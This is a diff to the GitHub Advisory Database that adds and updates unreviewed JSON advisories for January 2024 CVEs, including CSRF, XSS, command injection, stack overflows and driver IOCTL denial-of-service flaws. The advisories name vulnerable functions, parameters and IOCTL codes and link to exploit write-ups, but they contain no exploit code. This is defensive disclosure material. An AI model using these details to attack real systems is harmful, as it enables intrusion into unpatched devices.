0000000000000..b380e7f5af36c --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-rm8m-jx8f-gg9f/GHSA-rm8m-jx8f-gg9f.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm8m-jx8f-gg9f", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T15:30:30Z", + "aliases": [ + "CVE-2023-7074" + ], + "details": "The WP SOCIAL BOOKMARK MENU WordPress plugin through 1.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-7074" + }, + { + "type": "WEB", + "url": "https://magos-securitas.com/txt/CVE-2023-7074.txt" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/7906c349-97b0-4d82-aef0-97a1175ae88e/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T15:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json b/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json new file mode 100644 index 0000000000000..9af91f70e6abb --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpp9-fjv3-6cxw", + "modified": "2024-01-29T18:31:49Z", + "published": "2024-01-29T18:31:49Z", + "aliases": [ + "CVE-2024-1008" + ], + "details": "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Profile Page. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252277 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1008" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252277" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252277" + }, + { + "type": "WEB", + "url": "https://www.youtube.com/watch?v=z4gcLZCOcnc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T16:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-rq2f-mxxc-3hv5/GHSA-rq2f-mxxc-3hv5.json b/advisories/unreviewed/2024/01/GHSA-rq2f-mxxc-3hv5/GHSA-rq2f-mxxc-3hv5.json new file mode 100644 index 0000000000000..080556b9f7528 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-rq2f-mxxc-3hv5/GHSA-rq2f-mxxc-3hv5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq2f-mxxc-3hv5", + "modified": "2024-02-05T18:31:36Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-37571" + ], + "details": "Softing TH SCOPE through 3.70 allows XSS.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37571" + }, + { + "type": "WEB", + "url": "https://industrial.softing.com" + }, + { + "type": "WEB", + "url": "https://industrial.softing.com/fileadmin/psirt/downloads/2024/syt-2024-1.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json b/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json index 6a176a83a09f9..7912ebd021885 100644 --- a/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json +++ b/advisories/unreviewed/2024/01/GHSA-rr4v-xrwq-7rhx/GHSA-rr4v-xrwq-7rhx.json @@ -45,6 +45,14 @@ "type": "WEB", "url": "https://dfir.ru/2024/01/15/cve-2023-4001-a-vulnerability-in-the-downstream-grub-boot-manager/" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3OBADMKHQLJOBA32Q7XPNSYMVHVAFDCB/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CHLZQ47HM64NDOHMHYO7VIJFYD5ZPPYN/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/15/3" diff --git a/advisories/unreviewed/2024/01/GHSA-rrr4-rqcr-8jmq/GHSA-rrr4-rqcr-8jmq.json b/advisories/unreviewed/2024/01/GHSA-rrr4-rqcr-8jmq/GHSA-rrr4-rqcr-8jmq.json new file mode 100644 index 0000000000000..d33b478e78e95 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-rrr4-rqcr-8jmq/GHSA-rrr4-rqcr-8jmq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrr4-rqcr-8jmq", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-0788" + ], + "details": "SUPERAntiSpyware Pro X v10.0.1260 is vulnerable to kernel-level API parameters manipulation and Denial of Service vulnerabilities by triggering the 0x9C402140 IOCTL code of the saskutil64.sys driver.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0788" + }, + { + "type": "WEB", + "url": "https://fluidattacks.com/advisories/brubeck/" + }, + { + "type": "WEB", + "url": "https://www.superantispyware.com/professional-x-edition.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json b/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json index 0709db767bfc9..016c78f173235 100644 --- a/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json +++ b/advisories/unreviewed/2024/01/GHSA-rvwq-r5pc-g3h9/GHSA-rvwq-r5pc-g3h9.json @@ -40,6 +40,10 @@ { "type": "WEB", "url": "https://support.apple.com/en-us/HT213941" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/02/05/8" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json b/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json index b45f5cecf6c3c..8c48fadd744d1 100644 --- a/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json +++ b/advisories/unreviewed/2024/01/GHSA-rx6w-gc3r-2fh2/GHSA-rx6w-gc3r-2fh2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-rx6w-gc3r-2fh2", - "modified": "2024-01-25T18:30:51Z", + "modified": "2024-01-31T21:31:03Z", "published": "2024-01-25T18:30:51Z", "aliases": [ "CVE-2024-22529" ], "details": "TOTOLINK X2000R_V2 V2.0.0-B20230727.10434 has a command injection vulnerability in the sub_449040 (handle function of formUploadFile) of /bin/boa.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T16:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-rx79-jj4h-rr5g/GHSA-rx79-jj4h-rr5g.json b/advisories/unreviewed/2024/01/GHSA-rx79-jj4h-rr5g/GHSA-rx79-jj4h-rr5g.json new file mode 100644 index 0000000000000..d65284da733b3 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-rx79-jj4h-rr5g/GHSA-rx79-jj4h-rr5g.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx79-jj4h-rr5g", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0994" + ], + "details": "A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been declared as critical. Affected by this vulnerability is the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0994" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-W6-has-stack-buffer-overflow-vulnerability-in-formSetCfm-4fab28f92ca74f519245b606d8345821?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252259" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252259" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T02:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-v23q-xxwx-66fg/GHSA-v23q-xxwx-66fg.json b/advisories/unreviewed/2024/01/GHSA-v23q-xxwx-66fg/GHSA-v23q-xxwx-66fg.json new file mode 100644 index 0000000000000..165021236b976 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-v23q-xxwx-66fg/GHSA-v23q-xxwx-66fg.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v23q-xxwx-66fg", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-1033" + ], + "details": "A vulnerability, which was classified as problematic, has been found in openBI up to 1.0.8. Affected by this issue is the function agent of the file /application/index/controller/Datament.php. The manipulation of the argument api leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252308.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1033" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/nD654ot6zRQZ" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252308" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252308" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T14:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-v334-55hv-wvc6/GHSA-v334-55hv-wvc6.json b/advisories/unreviewed/2024/01/GHSA-v334-55hv-wvc6/GHSA-v334-55hv-wvc6.json new file mode 100644 index 0000000000000..523f83add0837 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-v334-55hv-wvc6/GHSA-v334-55hv-wvc6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v334-55hv-wvc6", + "modified": "2024-01-30T09:30:34Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-6374" + ], + "details": "Authentication Bypass by Capture-replay vulnerability in Mitsubishi Electric Corporation MELSEC WS Series WS0-GETH00200 all serial numbers allows a remote unauthenticated attacker to bypass authentication by capture-replay attack and illegally login to the affected module. As a result, the remote attacker who has logged in illegally may be able to disclose or tamper with the programs and parameters in the modules.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6374" + }, + { + "type": "WEB", + "url": "https://jvn.jp/vu/JVNVU99497477" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-03" + }, + { + "type": "WEB", + "url": "https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-019_en.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-294" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-v3pc-xh3w-h68j/GHSA-v3pc-xh3w-h68j.json b/advisories/unreviewed/2024/01/GHSA-v3pc-xh3w-h68j/GHSA-v3pc-xh3w-h68j.json new file mode 100644 index 0000000000000..2555d82265178 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-v3pc-xh3w-h68j/GHSA-v3pc-xh3w-h68j.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3pc-xh3w-h68j", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22150" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PWR Plugins Portfolio & Image Gallery for WordPress | PowerFolio allows Stored XSS.This issue affects Portfolio & Image Gallery for WordPress | PowerFolio: from n/a through 3.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22150" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/portfolio-elementor/wordpress-powerfolio-plugin-3-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json b/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json index 85eae2d046d90..ac68dc16587f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json +++ b/advisories/unreviewed/2024/01/GHSA-v4r8-6m3f-gvv4/GHSA-v4r8-6m3f-gvv4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v4r8-6m3f-gvv4", - "modified": "2024-01-10T18:30:24Z", + "modified": "2024-01-30T15:30:20Z", "published": "2024-01-03T09:30:33Z", "aliases": [ "CVE-2023-6747" @@ -25,6 +25,14 @@ "type": "WEB", "url": "https://fooplugins.com/foogallery-wordpress-gallery-plugin/pricing/" }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/foogallery/tags/2.4.9/includes/class-gallery-advanced-settings.php?rev=3027668#L149" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/foogallery/tags/2.4.9/includes/functions.php#L1609" + }, { "type": "WEB", "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dce8ac32-cab8-4e05-bf6f-cc348d0c9472?source=cve" diff --git a/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json b/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json index b620669b75534..0c40dbaf29fa2 100644 --- a/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json +++ b/advisories/unreviewed/2024/01/GHSA-v576-wfmr-x3x7/GHSA-v576-wfmr-x3x7.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v576-wfmr-x3x7", - "modified": "2024-01-23T21:30:21Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-23T21:30:21Z", "aliases": [ "CVE-2023-52324" ], "details": "An unrestricted file upload vulnerability in Trend Micro Apex Central could allow a remote attacker to create arbitrary files on affected installations.\n\nPlease note: although authentication is required to exploit this vulnerability, this vulnerability could be exploited when the attacker has any valid set of credentials. Also, this vulnerability could be potentially used in combination with another vulnerability to execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-434" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T21:15:09Z" diff --git a/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json b/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json index 8692daed64bd0..630ac8be1db39 100644 --- a/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json +++ b/advisories/unreviewed/2024/01/GHSA-v5j5-3255-x56m/GHSA-v5j5-3255-x56m.json @@ -28,7 +28,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-88" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json b/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json index 21bdb3456fa83..857d19be2e86c 100644 --- a/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json +++ b/advisories/unreviewed/2024/01/GHSA-v7gp-f4wc-h5w4/GHSA-v7gp-f4wc-h5w4.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-v7gp-f4wc-h5w4", - "modified": "2024-01-22T15:30:23Z", + "modified": "2024-01-29T18:31:46Z", "published": "2024-01-22T15:30:23Z", "aliases": [ "CVE-2020-36771" ], "details": "CloudLinux\n CageFS 7.1.1-1 or below passes the authentication token as command line\n argument. In some configurations this allows local users to view it via\n the process list and gain code execution as another user.\n\n\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -35,7 +38,7 @@ "cwe_ids": [ "CWE-214" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-22T14:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-v7v5-mxj3-9qmp/GHSA-v7v5-mxj3-9qmp.json b/advisories/unreviewed/2024/01/GHSA-v7v5-mxj3-9qmp/GHSA-v7v5-mxj3-9qmp.json new file mode 100644 index 0000000000000..1d4e372fbd943 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-v7v5-mxj3-9qmp/GHSA-v7v5-mxj3-9qmp.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v7v5-mxj3-9qmp", + "modified": "2024-01-29T18:31:49Z", + "published": "2024-01-29T18:31:49Z", + "aliases": [ + "CVE-2024-23441" + ], + "details": "Vba32 Antivirus v3.36.0 is vulnerable to a Denial of Service vulnerability by triggering the 0x2220A7 IOCTL code of the Vba32m64.sys driver.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23441" + }, + { + "type": "WEB", + "url": "https://fluidattacks.com/advisories/rollins/" + }, + { + "type": "WEB", + "url": "https://www.anti-virus.by/vba32" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400", + "CWE-476" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T16:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json b/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json index 4c82650afa025..f260054f1ce30 100644 --- a/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json +++ b/advisories/unreviewed/2024/01/GHSA-v9cm-8hxg-x4rc/GHSA-v9cm-8hxg-x4rc.json @@ -32,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-79" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-v9pc-9fc9-4ff8/GHSA-v9pc-9fc9-4ff8.json b/advisories/unreviewed/2024/01/GHSA-v9pc-9fc9-4ff8/GHSA-v9pc-9fc9-4ff8.json new file mode 100644 index 0000000000000..a27e44ae27677 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-v9pc-9fc9-4ff8/GHSA-v9pc-9fc9-4ff8.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9pc-9fc9-4ff8", + "modified": "2024-01-29T00:30:17Z", + "published": "2024-01-29T00:30:17Z", + "aliases": [ + "CVE-2024-0986" + ], + "details": "A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0986" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/10BYLQ7Rk4oag96afLZouSvDDPvsO7SoJ/view?usp=drive_link" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252251" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252251" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T00:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json b/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json index 4d93c780f1d52..75c01195fc183 100644 --- a/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json +++ b/advisories/unreviewed/2024/01/GHSA-vg35-f2fg-jc49/GHSA-vg35-f2fg-jc49.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vg35-f2fg-jc49", - "modified": "2024-01-27T09:30:35Z", + "modified": "2024-02-03T00:31:32Z", "published": "2024-01-27T09:30:35Z", "aliases": [ "CVE-2024-22861" ], "details": "Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-27T07:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json b/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json index 2a2fca2b24773..80540c5b97932 100644 --- a/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json +++ b/advisories/unreviewed/2024/01/GHSA-vh9j-8vw4-5hp6/GHSA-vh9j-8vw4-5hp6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vh9j-8vw4-5hp6", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-01-30T21:30:28Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-52040" ], "details": "An issue discovered in TOTOLINK X6000R v9.4.0cu.852_B20230719 allows attackers to run arbitrary commands via the sub_41284C function.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json b/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json index 5376897c620db..03c2a4b689f84 100644 --- a/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json +++ b/advisories/unreviewed/2024/01/GHSA-vhm4-6qm7-jwhr/GHSA-vhm4-6qm7-jwhr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vhm4-6qm7-jwhr", - "modified": "2024-01-27T06:30:22Z", + "modified": "2024-02-01T06:31:04Z", "published": "2024-01-27T06:30:22Z", "aliases": [ "CVE-2024-0667" @@ -36,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-352" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json b/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json index 3617d07f80f7f..109a81ea2c5ce 100644 --- a/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json +++ b/advisories/unreviewed/2024/01/GHSA-vhw4-mjfv-p3gg/GHSA-vhw4-mjfv-p3gg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-vhw4-mjfv-p3gg", - "modified": "2024-01-23T12:30:29Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-23T12:30:29Z", "aliases": [ "CVE-2024-23180" ], "details": "Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary code by uploading a specially crafted SVG file.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T10:15:10Z" diff --git a/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json b/advisories/unreviewed/2024/01/GHSA-vmjp-26xc-5h39/GHSA-vmjp-26xc-5h39.json index 148881f2c01fb..988884fa99976 100644 --- 